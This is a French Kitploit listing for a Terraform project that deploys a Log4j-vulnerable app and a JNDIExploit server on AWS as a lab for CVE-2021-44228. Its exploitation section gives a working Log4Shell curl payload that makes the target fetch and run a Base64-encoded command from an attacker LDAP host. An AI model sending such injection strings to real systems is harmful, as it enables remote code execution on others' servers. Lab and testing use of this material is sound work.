Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
log4j-vulnerable-app-cve-2021-44228-terraform — Un Terraform pour déployer une application vulnérable et un JDNIExploit pour travailler avec CVE-2021-44228 | Kitploit
Outils/GitHubGitHub/mkhazamipour/log4j-vulnerable-app-cve-2021-44228-terraform
Sécurité de l'Infrastructure CloudGénération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'Intrusion
GitHubmkhazamipour/log4j-vulnerable-app-cve-2021-44228-terraform

log4j-vulnerable-app-cve-2021-44228-terraform

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Un Terraform pour déployer une application vulnérable et un JDNIExploit pour travailler avec CVE-2021-44228

Voir le dépôt
21il y a 4 ansPas encore vérifié

log4j-vulnerable-app-cve-2021-44228-terraform

Un Terraform pour déployer une application vulnérable et un JNDIExploit pour fonctionner avec CVE-2021-44228

À propos de la stack

Ce Terraform crée deux instances sur un VPC dans AWS Cloud.

Vous avez juste besoin d'exporter vos AWS_ACCESS_KEY_ID et AWS_SECRET_ACCESS_KEY

Une instance est JNDIExploit.

La seconde est une Vulnérable-App pour l'exploit log4j

Veuillez remplacer votre clé publique SSH dans Terraform avant d'appliquer

root@kitploit:~
terraform init
terraform plan
terraform apply --auto-approve

Exploitation

Après le déploiement sur AWS, vous pouvez l'exploiter avec une requête curl et vérifier la création du fichier dans /tmp sur le conteneur de l'application vulnérable.

root@kitploit:~
curl ${vulnerable-app-IP}:8090 -H 'X-Api-Version: ${jndi:ldap://${JNDIExploit-IP}:1389/Basic/Command/Base64/dG91Y2ggL3RtcC9wd25lZAo=}'

Sur le serveur de l'application vulnérable, exécutez la commande suivante pour vérifier l'exécution de la commande. Vous devriez voir le fichier pwned

root@kitploit:~
sudo docker exec -ti vulnerable-app ls /tmp
Télécharger l’outil